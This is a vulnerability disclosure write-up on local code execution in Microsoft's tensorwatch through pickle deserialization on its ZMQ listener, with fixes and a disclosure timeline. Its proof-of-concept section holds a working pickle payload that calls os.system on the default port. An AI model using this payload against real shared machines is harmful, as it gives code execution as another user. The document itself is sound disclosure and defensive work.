Microsoft tensorwatch: Local Code Execution via Pickle Deserialization in ZMQ Listener

Introduction

The last finding in my pickle deserialization audit is a quieter one. tensorwatch, Microsoft’s debugging and visualization tool for ML training (3,463 stars), has a local code execution vulnerability that is exposed by the very first line of every README example.

When you call tw.Watcher(), it silently creates a ZMQ REP socket on tcp://127.0.0.1:41459 in a background thread. That socket deserializes incoming messages with pickle.loads() - no auth, no validation. Any user on the same machine can connect and execute code as the user running tensorwatch.

Target: microsoft/tensorwatch
Stars: 3,463
Package: tensorwatch 0.9.1 on PyPI
Severity: High (CVSS 3.1: 7.8 - Local only)

What is tensorwatch?

tensorwatch is a Microsoft Research project for debugging, monitoring, and visualizing ML (Machine Learning) training. It provides real-time visualization of training metrics, model architecture inspection, and dataset exploration. The core API starts with tw.Watcher(), which creates a monitoring context that communicates over ZMQ sockets.

At the time of discovery, the project had not had a code commit in over two years (the last change was a README update in September 2025).

The Vulnerability

The vulnerable code is in tensorwatch/zmq_wrapper.py. When tw.Watcher() is instantiated, it creates a ClientServer object that binds a ZMQ REP socket:

Lines 236-257:

def _connect(self, port, is_server, callback, host):
    def callback_wrapper(callback, msg):
        [obj_s] = msg
        ret = callback(self, pickle.loads(obj_s))  # line 242 - RCE
        self._socket.send_multipart([pickle.dumps((ret, None))])

    if is_server:
        host = host or '127.0.0.1'       # localhost by default
        self._socket = context.socket(zmq.REP)
        self._socket.bind('tcp://%s:%d' % (host, port))

The callback runs in a background I/O thread via Tornado’s IOLoop. When a message arrives on the REP socket, it’s deserialized with pickle.loads() and passed to the callback function. The deserialization happens before any callback logic.

The default port is 41459, defined in lv_types.py as DefaultPorts.CliSrv.
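To see why deserializing before any callback logic matters, here is a minimal, harmless sketch of the same mechanism using only the standard library. The class name Probe is hypothetical, and int stands in for the callable an attacker would choose (the exploit later in this post uses os.system).

```python
import pickle


class Probe:
    """Hypothetical payload class; the name is illustrative only."""

    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call int('42')".
        # The sender picks the callable and its arguments.
        return (int, ("42",))


wire_bytes = pickle.dumps(Probe())

# The receiver only calls pickle.loads(). The callable named by the
# sender runs during loading, before the result reaches any callback.
result = pickle.loads(wire_bytes)
print(type(result).__name__, result)
```

The receiver gets back whatever the chosen callable returned, not a Probe instance. No validation placed after pickle.loads() can help, because the call has already happened by then.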

What the User Sees

Nothing. That’s the problem. Here’s the typical tensorwatch usage from the README:

import tensorwatch as tw
w = tw.Watcher()  # This silently opens a network socket

# ... training loop with w.observe() calls ...

The user doesn’t know that tw.Watcher() just opened a ZMQ REP socket on port 41459. There’s no log message, no warning, no documentation about the socket. It runs in a background thread and silently accepts connections.
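One way to confirm the listener is there is to try a plain TCP connection to the port. The sketch below uses only the standard library; the helper name is_listening is my own, and a True result only means something accepted a connection on that port, not that it is tensorwatch.

```python
import socket


def is_listening(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if a TCP connection to (host, port) succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        # connect_ex returns 0 on success instead of raising an exception.
        return s.connect_ex((host, port)) == 0


if __name__ == "__main__":
    # 41459 is the default REP port described above.
    print("REP port reachable:", is_listening("127.0.0.1", 41459))
```

Running it before and after tw.Watcher() is created in another process should show the port going from unreachable to reachable.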

The PUB Socket (Not Vulnerable)

There’s also a PUB (publish) socket on port 40859 that binds to tcp://* (all interfaces) by default. However, ZMQ PUB sockets only send data - they don’t deliver attacker-controlled messages to the application. So while the PUB socket is network-exposed, it’s not exploitable for RCE.

Proof of Concept

Setting Up the Target

Tested against the unmodified tensorwatch==0.9.1 release from PyPI:

pip install tensorwatch==0.9.1
python -c "import tensorwatch as tw; w = tw.Watcher(); input('Running...')"

That’s it. The ZMQ REP socket is now listening on tcp://127.0.0.1:41459.

The Exploit

From a second terminal on the same machine:

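import zmq, pickle, os

class RCE:
    def __reduce__(self):
        # On unpickling, the receiver calls os.system() with this command
        return (os.system, ('id > /tmp/tensorwatch_pwned',))

ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)                  # REQ pairs with the target's REP socket
sock.connect('tcp://127.0.0.1:41459')       # default port (DefaultPorts.CliSrv)
sock.send_multipart([pickle.dumps(RCE())])  # single frame, as callback_wrapper expects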

Result

$ cat /tmp/tensorwatch_pwned
uid=1000(chocapikk) gid=1001(chocapikk) groups=1001(chocapikk),4(adm),24(cdrom),27(sudo),...

Attack Surface

Because the REP socket binds to 127.0.0.1, exploitation is limited to local scenarios:

Shared GPU servers - the most common case. Multi-user research clusters where multiple researchers share the same machine. If one user is running tensorwatch, any other user can connect to the socket and execute commands as that user.
Containers with host networking - Docker --network host shares the host’s network namespace, exposing localhost ports across containers.
Misconfigured deployments - if a user passes host='*' or host='0.0.0.0' to the Watcher constructor, the socket becomes network-accessible.

Port 41459 is a fixed, predictable default, so an attacker doesn’t need to scan - they know exactly where to connect.

Microsoft’s Security Notice

In September 2025, Microsoft added a security notice to the tensorwatch README:

Security Warning: Be careful when loading pickle files from untrusted sources…

This notice only addresses loading .pkl files from disk. It doesn’t mention the ZMQ socket that tw.Watcher() opens, which is a completely different attack surface. The README warning and the vulnerability I’m reporting are unrelated.

Suggested Fix

Replace pickle.loads() with JSON or MessagePack for the ZMQ RPC protocol. The messages are monitoring data - metrics, tensor shapes, log entries - that don’t require pickle serialization.
Add ZMQ CURVE authentication to the REP socket.
Make the socket opt-in. Don’t silently open a network socket on tw.Watcher(). Require explicit configuration to enable the ZMQ listener.
If pickle is required, use a RestrictedUnpickler with an explicit allowlist.
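As an illustration of the last option, here is a minimal sketch of an allowlist-based unpickler built on the standard library’s pickle.Unpickler.find_class hook. The allowlist contents and the names ALLOWED_GLOBALS, restricted_loads and Probe are assumptions for this example; this is not tensorwatch’s code.

```python
import io
import pickle

# Assumed allowlist: the only (module, name) pairs the unpickler may resolve.
# Plain dicts, lists, strings and numbers need no entry, since pickle encodes
# them with dedicated opcodes rather than global lookups.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle stream asks to import.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads() that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Probe:
    """Harmless stand-in for a malicious payload (hypothetical name)."""

    def __reduce__(self):
        return (int, ("42",))


# Plain monitoring data still round-trips.
print(restricted_loads(pickle.dumps({"loss": 0.25, "step": 3})))

# A payload that names a callable outside the allowlist is rejected.
try:
    restricted_loads(pickle.dumps(Probe()))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

An allowlist fails closed: anything not explicitly listed is refused. A blocklist has to anticipate every dangerous callable in every importable module.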

Realistically, given that the project had been unmaintained for over two years when I reported this (the September 2025 README update was the only change), a fix seemed unlikely. Users should be aware that calling tw.Watcher() opens a local attack surface.

Timeline

2025-09-27: Microsoft adds security notice to README (6fe1359) - covers only .pkl files, not ZMQ surface
2026-02-10: ZMQ vulnerability discovered and confirmed via PoC against real tensorwatch 0.9.1 from PyPI
2026-02-11: CVE request submitted to VulnCheck
2026-02-12: VulnCheck initiates outreach to MSRC, 120-day deadline set (June 12, 2026)
2026-03-06: Microsoft silently fixes the ZMQ pickle deserialization with HMAC-SHA256 signing (2fe6ed3) - no CVE, no credit
2026-03-17: Additional hardening: RestrictedUnpickler, HMAC env var sharing, YAML SafeLoader (afe9390, 9bc973b, f286895)
2026-03-27: MSRC marks report as “duplicate” without issuing a CVE or crediting the reporter
2026-03-30: Microsoft switches RestrictedUnpickler from blocklist to allowlist (da2df33) - exact approach from our suggested fix
2026-04-23: MSRC marks case as “Completed” without further comment. VulnCheck closes CVD request. Public disclosure.

What Actually Happened

VulnCheck forwarded our report to MSRC on February 12, 2026, with a 120-day disclosure deadline.

Three weeks later, on March 6, Microsoft pushed a commit titled “fix unsafe pickle deserialization vulnerability in ZMQ transport” - implementing HMAC-SHA256 verification on all ZMQ messages and binding to localhost by default. Over the following weeks, they added a RestrictedUnpickler with an allowlist, environment variable key sharing, and YAML hardening. Each commit directly addresses the attack surface described in our report.
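For readers unfamiliar with message signing, the general idea behind HMAC-SHA256 verification can be sketched with the standard library alone. This is not Microsoft’s implementation: the frame layout (tag followed by payload) and the names sign and verify are assumptions for illustration.

```python
import hashlib
import hmac
import os

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes for SHA-256


def sign(key: bytes, payload: bytes) -> bytes:
    """Prefix the payload with its HMAC-SHA256 tag (assumed frame layout)."""
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return tag + payload


def verify(key: bytes, frame: bytes) -> bytes:
    """Return the payload if the tag is valid, else raise ValueError."""
    if len(frame) < TAG_LEN:
        raise ValueError("frame too short")
    tag, payload = frame[:TAG_LEN], frame[TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    # compare_digest avoids leaking the tag through timing differences.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad signature")
    return payload


key = os.urandom(32)            # shared secret known to both endpoints
frame = sign(key, b"metrics")
print(verify(key, frame))       # payload is returned only after the check

forged = sign(os.urandom(32), b"malicious pickle bytes")
try:
    verify(key, forged)
except ValueError as exc:
    print("rejected:", exc)
```

The check has to run before the payload is deserialized, and on a shared machine the key must not be readable by other local users, otherwise the signature adds nothing.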

Despite the fix clearly corresponding to our report:

MSRC marked the submission as a “duplicate” without identifying the original report
No CVE was issued
No credit was given to the reporter
The case was marked “Completed” without explanation

The commit history speaks for itself. From its creation until our report, the project’s only security-related change was the README-only notice of September 2025. Within three weeks of our report reaching MSRC, the exact vulnerability surface we documented received a multi-commit security hardening effort implementing the exact mitigations we suggested.

Takeaways

tensorwatch is different from the other vulnerabilities in this series. It’s local-only (CVSS 7.8 instead of 9.8), and the ZMQ attack surface is now mitigated in the latest code.

The real issue is the silent socket. tw.Watcher() is the first line in every README example, the entry point to the entire library, and it opens a network listener without telling the user. On shared GPU servers where multiple researchers use the same machine, that’s a real attack surface that nobody knows is there.

The secondary issue is the vulnerability coordination process. When a vendor silently fixes a reported vulnerability, marks the report as “duplicate” without evidence, and closes the case without a CVE or credit, it discourages responsible disclosure. The fix commits are timestamped. The report is timestamped. The timeline is clear.